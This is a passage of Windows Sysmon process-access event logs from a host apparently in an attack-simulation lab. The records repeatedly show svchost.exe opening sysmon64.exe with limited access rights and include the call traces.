05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1361,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1362,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1363,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1364,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1365,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1366,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1367,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1368,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 